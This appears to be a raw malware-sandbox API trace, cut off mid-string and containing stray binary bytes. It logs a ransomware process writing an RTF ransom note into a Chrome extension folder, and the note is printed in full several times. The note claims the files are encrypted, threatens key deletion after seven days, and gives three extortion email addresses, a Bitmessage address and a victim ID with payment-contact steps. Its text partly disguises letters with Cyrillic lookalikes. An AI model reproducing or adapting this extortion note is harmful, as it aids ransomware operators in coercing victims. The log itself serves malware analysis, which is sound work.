\\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.069] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.070] CloseHandle (hObject=0x294) returned 1 [0285.070] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\#readme_eman#.rtf")) returned 0xffffffff [0285.070] GetLastError () returned 0x2 [0285.070] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.070] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.070] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.070] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. 